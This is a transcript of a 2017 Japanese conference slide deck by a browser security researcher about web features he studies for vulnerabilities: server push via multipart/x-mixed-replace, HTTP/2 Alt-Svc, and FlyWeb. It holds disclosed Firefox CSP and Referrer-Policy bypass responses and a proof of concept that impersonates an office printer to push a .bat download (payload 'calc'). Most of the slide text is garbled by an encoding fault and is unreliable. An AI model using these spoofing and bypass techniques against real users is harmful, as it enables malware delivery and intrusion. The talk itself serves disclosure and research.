Upgrade to Pro — share decks privately, control downloads, hide ads and more …

脆弱性発見者が注目する近年のWeb技術

 脆弱性発見者が注目する近年のWeb技術

RECRUIT Technologies NIGHT vol.3の発表資料です。

MUNEAKI NISHIMURA

February 03, 2017
Tweet

More Decks by MUNEAKI NISHIMURA

Other Decks in Technology

Transcript

  1. ੬ऑੑൃݟऀ͕஫໨͢Δۙ೥ͷ8FCٕज़
    3&$36*55FDIOPMPHJFT/*()5WPM
    ೥݄೔

    View full-size slide

  2. ੢ଜ फߊ
    גࣜձࣾϦΫϧʔτςΫϊϩδʔζ
    αΠόʔηΩϡϦςΟΤϯδχΞϦϯά෦
    γχΞηΩϡϦςΟΤϯδχΞ
    ࠃ಺ܞଳి࿩ϝʔΧʔͰͷηΩϡϦςΟίϯαϧλϯτ
    ͳͲΛܦͯ೥݄ΑΓݱ৬ɻϦΫϧʔτͷ*%؅ཧج
    ൫ͷηΩϡϦςΟอक΍ϦΫϧʔτάϧʔϓશࣾͷ੬ऑ
    ੑमਖ਼ࢧԉʹܞΘΔɻझຯ͸ϒϥ΢βͷ੬ऑੑΛ୳͢͜
    ͱɻ೥ʹใࠂͨ͠੬ऑੑ͸݅Λ௒͑Δɻஶॻʹ
    ϒϥ΢βϋοΫʢ؂༁ʣɻओͳߨԋྺʹ$0%& #-6&
    ɺ"750,:0 ɺ1BD4FD ɻ೥ΑΓ
    ηΩϡϦςΟɾΩϟϯϓશࠃେձߨࢣ

    View full-size slide

  3. ੬ऑੑΛൃݟ͢Δਓͷࢹ఺Ͱ
    ஫໨͍ͯ͠Δ8FCٕज़Λ঺հ͠·͢

    View full-size slide

  4. • ௕೥ʹ౉Γٞ࿦ͱվળ͕ଓ͚ΒΕ͍ͯΔ8FCٕज़
    • աڈʹ͸4FSWFS4FOU&WFOUT΍8FC4PDLFU
    • *&5'Ͱ͸)551QVTIΛޮՌతʹѻ͏ٕज़ͱͯ͠
    &BSMZ)JOUT͕ఏҊ͞Ε͍ͯΔ
    • ଞʹ΋ɺϒϥ΢βͰ1VTI௨஌Λड͚औΔٕज़ͷඪ४Խ͕ਐΜͰ͓Γɺ
    8FC1VTIϓϩτίϧ΍1VTI"1*ͷ࢓༷ࡦఆ͕ߦͳΘΕ͍ͯΔ
    • ͦΜͳதɺݸਓతʹ஫໨͍ͯ͠Δͷ͸ʜ
    4FSWFS1VTI

    View full-size slide

  5. multipart / x-mixed-replace

    View full-size slide

  6. http://web.archive.org/web/19961020045320/http://www3.netscape.com/assist/net_sites/pushpull.html

    View full-size slide

  7. • ೥ɺ/FUTDBQFʹ౥ࡌ͞Εͨ࠷ݹͷ4FSWFS1VTI
    • .+1&(PWFS)551ͷ഑৴खஈͱͯ͠΋࢖༻͞Ε͍ͯΔ
    • .P[JMMBͷ5FMFNFUSZʹΑΔͱɺݱࡏͷར༻཰͸
    • ݱࡏͰ͸ɺ'JSFGPY͘Β͍͔͠·ͱ΋ʹαϙʔτ͍ͯ͠ͳ͍
    • ҰମͲ͜Ͱ࢖ΘΕ͍ͯΔͷ͔
    NVMUJQBSUYNJYFESFQMBDF

    View full-size slide

  8. #VH[JMMBͷݕࡧը໘
    https://bugzilla.mozilla.org/buglist.cgi?quicksearch=nishimunea

    View full-size slide

  9. 3*$0)5)&5"
    https://developers.theta360.com/ja/docs/v2.1/api_reference/commands/camera.get_live_preview.html

    View full-size slide

  10. HTTP/1.0 200
    Content-type: multipart/x-mixed-replace;boundary=BOUNDARY
    --BOUNDARY
    Content-type: text/html
    Page 1
    --BOUNDARY
    Content-type: text/html
    Page 2
    --BOUNDARY-
    ϖʔδ໨ͷσʔλ
    ϖʔδ໨ͷσʔλ

    View full-size slide

  11. Կނ஫໨͍ͯ͠Δ͔ͱ͍͏ͱ

    View full-size slide

  12. ηΩϡϦςΟϔομΛΑ͘ແࢹ͢Δ

    View full-size slide

  13. HTTP/1.0 200
    Content-type: multipart/x-mixed-replace;boundary=BOUNDARY
    Content-Security-Policy: default-src 'self'
    --BOUNDARY
    Content-type: text/html
    alert(1)
    --BOUNDARY
    Content-type: text/html
    Page 2
    --BOUNDARY-
    $41ͰΠϯϥΠϯεΫϦϓτͷ࣮ߦΛېࢭ

    View full-size slide

  14. HTTP/1.0 200
    Content-type: multipart/x-mixed-replace;boundary=BOUNDARY
    Content-Security-Policy: default-src 'self'
    --BOUNDARY
    Content-type: text/html
    alert(1)
    --BOUNDARY
    Content-type: text/html
    Page 2
    --BOUNDARY-

    View full-size slide

  15. https://www.mozilla.org/en-US/security/advisories/mfsa2016-45/

    View full-size slide

  16. HTTP/1.0 200
    Content-type: multipart/x-mixed-replace;boundary=BOUNDARY
    --BOUNDARY
    Content-type: text/html
    Content-Security-Policy: default-src 'self'
    alert(1)
    --BOUNDARY
    Content-type: text/html
    Page 2
    --BOUNDARY-
    $41ϔομͷҐஔΛԼʹͣΒͯ͠ΈΔ

    View full-size slide

  17. HTTP/1.0 200
    Content-type: multipart/x-mixed-replace;boundary=BOUNDARY
    --BOUNDARY
    Content-type: text/html
    Content-Security-Policy: default-src 'self'
    alert(1)
    --BOUNDARY
    Content-type: text/html
    Page 2
    --BOUNDARY-

    View full-size slide

  18. ·ͩ௚ͬͯͳ͍
    https://bugzilla.mozilla.org/show_bug.cgi?id=1296471

    View full-size slide

  19. https://bugzilla.mozilla.org/show_bug.cgi?id=1296471
    ੬ऑੑΛӅ͢͜ͱΑΓɺ$41ͷ࣮૷͕ෆ׬શͰ͋Δ͜ͱΛ
    8FCαΠτͷ։ൃऀ͕஌Δ͜ͱͷํ͕େ੾ͩͱ൑அ͠ɺ
    .P[JMMB͸ະमਖ਼ͷ੬ऑੑ৘ใΛ։ࣔ

    View full-size slide

  20. HTTP/1.0 200
    Content-type: multipart/x-mixed-replace;boundary=BOUNDARY
    Referrer-Policy: no-referrer
    --BOUNDARY
    Content-type: text/html
    Link
    --BOUNDARY
    Content-type: text/html
    Page 2
    --BOUNDARY-
    3FGFSSFS1PMJDZϔομͰϦϑΝϥૹग़Λېࢭ
    ͳͷʹϦϑΝϥ͕ૹΒΕΔ

    View full-size slide

  21. https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/#CVE-2017-5385
    'JSFGPYͰઌिमਖ਼͞Εͨ

    View full-size slide

  22. ৽͍͠ϔομ͕ొ৔͢Δͨͼָ͠ΊΔ

    View full-size slide

  23. • ೔࿨ݟ҉߸Λѱ༻ͯ͠ɺِͷ)5514αʔόʹ઀ଓͤ͞Δ͜ͱͷ
    Ͱ͖Δ੬ऑੑʢ$7&ʣΛ-5Ͱ঺հͨ͠
    +YDL͞Μͱͷग़ձ͍͸ɺIUUQษڧձͰͨ͠
    https://http2study.connpass.com/event/13251/

    View full-size slide

  24. ͦͷ੬ऑੑͷ࠶ݱө૾ΛݟͯΈ·͠ΐ͏

    View full-size slide

  25. ੬ऑੑͷݪҼ͸5-4ηογϣϯͷ࠶ར༻Ͱͨ͠
    twitter.com (Fake)
    evil.csrf.jp
    https://twitter.com Reuse TLS Session Ticket (Session Resumption)
    Fake Application Data
    http://evil.csrf.jp
    alt-svc: h2="twitter.com:8021"
    TLS Session Ticket
    http://evil.csrf.jp Establish TLS Session without server certificate verification

    View full-size slide

  26. ੬ऑੑͷݪҼ͸5-4ηογϣϯͷ࠶ར༻Ͱͨ͠
    twitter.com (Fake)
    evil.csrf.jp
    https://twitter.com Reuse TLS Session Ticket (Session Resumption)
    Fake Application Data
    http://evil.csrf.jp
    alt-svc: h2="twitter.com:8021"
    TLS Session Ticket
    http://evil.csrf.jp Establish TLS Session without server certificate verification
    ೔࿨ݟ҉߸Ͱαʔόূ໌ॻΛݕূͤͣʹ
    ཱ֬ͨ͠5-4ηογϣϯΛʜ
    )5514௨৴࣌ʹ࠶ར༻͍ͯͨ͠

    View full-size slide

  27. • )551$POOFDUJPO3FVTF 3'$

    - ಉ͡*1ΞυϨεɺ͔ͭಉ͡ূ໌ॻͷ$/4"/ʹؚ·ΕΔϗετͱͷ௨৴Ͱ͋Ε͹ɺ
    )551ίωΫγϣϯΛڞ༗ͯ͠Α͍
    • )551"MUFSOBUJWF4FSWJDFT 3'$

    - ಉ͡ϦιʔεΛఏڙ͢Δ୅ସαʔόͷ࢖༻ΛΫϥΠΞϯτʹఏҊ͢Δ
    - ྫʣBMUFYBNQMFKQͷ൪ϙʔτͰ)551ʹΑΔ௨৴ΛΦϑΝʔ
    )551ͷίωΫγϣϯ؅ཧ͸ͳ͔ͳ͔େม
    alt-svc: h2="alt.example.jp:8000";

    View full-size slide

  28. flickr.com
    ෳ਺υϝΠϯͷ)551ίωΫγϣϯΛڞ༗͢Δͱ͖
    flickr.com
    yahoo.com
    yahoo.com
    Certificate (valid for yahoo.com & flickr.com)
    Establish TLS Session
    ZBIPPDPNͱͷ௨৴Ͱཱ֬͞ΕͨίωΫγϣϯΛ
    GMJDLSDPNͱͷ௨৴ʹར༻Ͱ͖Δ
    Connection

    View full-size slide

  29. flickr.com
    αʔόূ໌ॻͷϐϯχϯάݕূ͕Α͘࿙ΕΔ
    flickr.com
    yahoo.com
    yahoo.com
    Certificate (valid for yahoo.com & flickr.com)
    Establish TLS Session
    Connection
    ͜͜ͰɺGMJDLSDPNͷެ։伴ϐϯχϯάΛݕূ͠๨Εͯ͠·͏
    $7&ʢ'JSFGPYʣ$7&ʢ$ISPNFʣ

    View full-size slide

  30. flickr.com
    ͦΕͬͯ੬ऑੑʁ
    flickr.com
    yahoo.com
    Certificate (valid for yahoo.com & flickr.com)
    Connection
    yahoo.com Establish TLS Session
    ྆ํͷαΠτͷݖརऀ͸ҰॹͳͷͰ
    GMJDLSDPNͷϐϯχϯάΛݕূ͠ͳͯ͘΋
    ࣮࣭తͳڴҖ͸͋·Γͳ͍ͷͰ͸ʁ

    View full-size slide

  31. ಉ͡ূ໌ॻ͔ͩΒαΠτͷݖརऀ͕ಉ͡ͱ͸ݶΒͳ͍
    • ྫ͑͹ɺ'BTUMZͷڞ༗ূ໌ॻαʔϏε
    - IUUQTKBGPVSTRVBSFDPN ͷূ໌ॻΛݟͯΈΑ͏

    View full-size slide

  32. ͜ΕΒͷαΠτͷϐϯχϯάΛᷖճͰ͖Δͱ͍͏͜ͱ

    View full-size slide

  33. )551"MUFSOBUJWF4FSWJDF "MU4WD

    a.example.com
    HTTP/2 Application Data (authority: a.example.com)
    a.example.com
    alt-svc: h2="b.example.jp:443"
    Certificate
    a.example.com Establish TLS Session
    b.example.jp
    Verify Certificate

    View full-size slide

  34. "MU4WDͷਖ਼͍࣮͠૷͸͜͏ͳΜͰ͕͢ʜ
    a.example.com
    HTTP/2 Application Data (authority: a.example.com)
    a.example.com
    alt-svc: h2="b.example.jp:443"
    Certificate
    a.example.com Establish TLS Session
    b.example.jp
    Verify Certificate
    BFYBNQMFDPNͷূ໌ॻΛ4/*Ͱཁٻ
    BFYBNQMFDPNͷূ໌ॻͰ͋Δ͜ͱΛݕূ

    View full-size slide

  35. ࣮૷ΛޡΔͱ%/4ϦόΠϯσΟϯά੬ऑੑʹͳΔ
    a.example.com
    HTTP/2 Application Data (authority: a.example.com)
    a.example.com
    alt-svc: h2="b.example.jp:443"
    Certificate
    a.example.com Establish TLS Session
    b.example.jp
    Verify Certificate
    CFYBNQMFKQͷূ໌ॻΛ4/*Ͱཁٻ
    CFYBNQMFKQͷূ໌ॻͰ͋Δ͜ͱΛݕূ
    BFYBNQMFDPNͷ)551σʔλΛ
    ଞਓͷαʔόʹૹΓ෇͚Δ͜ͱ͕Ͱ͖Δ

    View full-size slide

  36. ͜ͷ࣮૷ϛε͕ݪҼͰ$034ΛᷖճͰ͖ͨྫ΋
    evil
    XMLHttpRequest
    with DELETE method
    alt-svc: h2="victim:443"
    victim
    Preflight (OPTIONS method)
    DELETE request
    1SFGMJHIUΛ߈ܸऀͷαΠτͰड͚ͯʜ
    ࣮ϦΫΤετ͚ͩΛඪతʹૹΔ

    View full-size slide

  37. https://bugzilla.mozilla.org/show_bug.cgi?id=1148357
    ࢲ͸ڻ͍͍ͯΔɻ͜Ε͸"MU4WDΛ༻͍ͨॳͷ੬ऑੑͩ

    View full-size slide

  38. ಉ͡Α͏ͳ੬ऑੑ͕͖ͬͱࠓޙ΋ग़͖ͯͦ͏

    View full-size slide

  39. https://flyweb.github.io/#showcase

    View full-size slide

  40. • .P[JMMB͕࣮ࢪ͍ͯ͠Δɺ8FCͱ෺ཧσόΠεͷ࿈ܞϓϩδΣΫτ
    - 8FCίϯςϯπͱɺͦΕΛӾཡͨ͠ਓͷۙ͘ʹ͋Δ༷ʑͳσόΠε͕࿈ಈ
    • ϓϩδΣΫτ͸·࣮ͩݧஈ֊
    - 'JSFGPY/JHIUMZʹͷΈσϑΥϧτແޮͰ౥ࡌ
    - BCPVUDPOGJH Ͱ EPNGMZXFCFOBCMFEUSVFʹઃఆ͢Δ͜ͱͰར༻Մೳ
    'MZ8FC

    View full-size slide

  41. • ෳ਺ͷεϚϗΛ઀ଓ͠ɺϒϥ΢β্ͰରઓܕϨʔεήʔϜΛ࣮ݱ
    'MZ8FCͷར༻ྫʢ'MZ8FC(1ʣ
    https://www.youtube.com/watch?v=FJ5DEGvqDb4

    View full-size slide

  42. 'MZ8FCͷ࢓૊Έ
    Local Network
    (1) Launch a website
    (2) HTML / JS
    (3) Publish mDNS and web servers
    (4) DNS Service Discovery
    (5) HTTP & WebSocket
    +BWB4DSJQUͰαʔόΛ্ཱͪ͛Δ
    ϩʔΧϧΤϦΞ಺ͷ୺຤͕ͦͷαʔόʹΞΫηε

    View full-size slide

  43. navigator.publishServer('MyServer').then(server => {
    server.onfetch = e => {
    var headers = {'Content-Type': 'text/html'};
    var body = 'Hello FlyWeb';
    e.respondWith(new Response(body, {headers: headers}));
    };
    });

    View full-size slide

  44. navigator.publishServer('MyServer').then(server => {
    server.onfetch = e => {
    var headers = {'Content-Type': 'text/html'};
    var body = 'Hello FlyWeb';
    e.respondWith(new Response(body, {headers: headers}));
    };
    });
    .Z4FSWFS@GMZXFC@UDQMPDBMͱ͍͏αʔϏε໊Ͱ
    N%/4ͱ)551αʔόΛىಈ
    ϩʔΧϧΤϦΞͷ୺຤͕αʔόʹΞΫηε͖ͯͨ͠Β
    )FMMP'MZ8FCͱॻ͔Εͨ)5.-Λฦ͢

    View full-size slide

  45. αʔόͷىಈ֬ೝμΠΞϩά͕ग़ͯ
    ϖʔδΛݟͨϢʔβ͕ʮ"MMPX4FSWFSʯΛબ୒͢Δͱ
    ϩʔΧϧΤϦΞͰN%/4ͱ)551αʔό͕ىಈ͢Δ

    View full-size slide

  46. ϩʔΧϧΤϦΞʹ͋Δผͷ୺຤͕αʔόʹͭͳ͕Δ
    • 'JSFGPY͕ϩʔΧϧΤϦΞʹ͋Δ'MZ8FCαʔόΛࣗಈతʹ୳ࡧ͠ɺ
    ΞΫηεͰ͖ΔΑ͏ʹͯ͘͠ΕΔ

    View full-size slide

  47. #POKPVSରԠΦϑΟεϓϦϯλͷ؅ཧը໘΋։͚Δ
    • 'JSFGPYͷ'MZ8FC΢Οϯυ΢͸@IUUQUDQʹ΋ରԠ͍ͯ͠ΔͷͰ
    #POKPVSͰ)551ͷ6*Λఏڙ͢Δػثʹ΋ΞΫηεͰ͖Δ

    View full-size slide

  48. 'MZ8FCͰձࣾͷωοτϫʔΫʹ৵ೖͰ͖ͦ͏ͩ
    Local Network
    (1) Launch a website
    (2) HTML / JS
    (3) Publish mDNS and web servers
    (4) Launch HTTP UI
    (5) Download malware
    'MZ8FCͰΦϑΟεϓϦϯλͷ
    ؅ཧը໘ʹͳΓ͢·͢
    ؅ཧը໘ʹΞΫηεͨ͠୺຤ʹ
    Ϛϧ΢ΣΞ഑෍
    ͏͔ͬΓࣾһ͕᠘αΠτΛӾཡ

    View full-size slide

  49. navigator.publishServer('Can0n ME220').then(server => {
    server.onfetch = e => {
    var h = {'Content-Type': 'application/bat',
    'Content-Disposition': 'attachment;
    filename=setup.bat'};
    var cmd = 'calc';
    e.respondWith(new Response(cmd, {headers: h}));
    };
    });
    ΦϑΟεϓϦϯλͱಉ͡%/4໊Λࢦఆ
    ΞΫηεͨ͠୺຤ʹ TFUVQCBU Λ഑෍

    View full-size slide

  50. ͕͢͞ʹυϝΠϯ͕ո͍͠ͷͰܯռ͞Εͦ͏͚ͩͲʜ

    View full-size slide

  51. (PPHMF຋༁ܦ༝Ͱ։͚͹ͦΕͬΆ͍υϝΠϯʹ

    View full-size slide

  52. ଞͷࣾһِ͕ͷΦϑΟεϓϦϯλʹΞΫηε͢Δͱʜ
    ϓϦϯλυϥΠό͔ͳ͊ʜʁ

    View full-size slide

  53. ͜ͷ··ͷ࢓༷ͩͱຊ౰ʹѱ༻͞Εͦ͏

    View full-size slide

  54. • 4FSWFS1VTI NVMUJQBSUYNJYFESFQMBDF

    • )551
    • 'MZ8FC
    ஫໨͍ͯ͠Δ8FCٕज़Λͭ঺հ͠·ͨ͠

    View full-size slide